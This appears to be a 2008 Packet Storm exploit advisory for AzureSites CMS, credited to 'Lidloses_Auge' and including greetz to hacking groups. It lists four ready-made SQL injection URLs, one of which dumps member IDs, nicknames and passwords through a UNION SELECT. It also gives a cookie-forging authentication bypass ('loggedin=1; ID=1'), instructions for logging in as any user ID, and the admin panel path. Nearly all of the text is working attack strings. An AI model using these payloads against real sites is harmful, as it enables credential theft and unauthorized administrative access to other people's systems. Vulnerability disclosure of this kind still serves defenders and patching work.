azuresites-sql.txt

2008-05-31T00:00:00
ID PACKETSTORM:66864
Type packetstorm
Reporter Lidloses_Auge
Modified 2008-05-31T00:00:00

Description

                                        
                                            `###############################################################  
#  
# AzureSites CMS - Multiple Vulnerabilities  
#  
# Vulnerabilities discovered by: Lidloses_Auge  
# Greetz to: -=Player=- , Suicide, g4ms3, enco,  
# GPM, Free-Hack, Ciphercrew, h4ck-y0u  
# Date: 26.05.2008  
#  
###############################################################  
#  
# Vulnerabilities:  
#  
# 1.) SQL Injection  
#  
# 1.1.) [Target]/index.php?page=null'union+select+1,2,3,4,5,concat_ws(0x202d20,id,nickname,password),7,8+from+members/*  
# 1.2.) [Target]/index.php?page=null&lang=null'union+select+1,2,3,4,5,6,7,8/*  
# 1.3.) [Target]/index.php?action=view_item&view_id=429&id_cat=null+union+select+1,2,3,4,5,6,7,8/*  
# 1.4.) [Target]/index.php?action=view_item&view_id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*  
#  
# 2.) Insecure Cookie Handling  
#  
# 2.1.) Cookie: loggedin=1; ID=1  
#  
# Notes:  
#  
# SQL Injection:  
#  
# The count of columns could be different. It depends on the injection. Some of them are Blind Injections.  
#  
# Insecure Cookie Handling:  
#  
# Use "Live HTTP Headers" to change the Cookie Value in the Header.  
# The ID depends on the UserID, you want to login with.  
# Admin Panel can be found at: [Target]/azureadmin/index.php  
#  
###############################################################  
  
`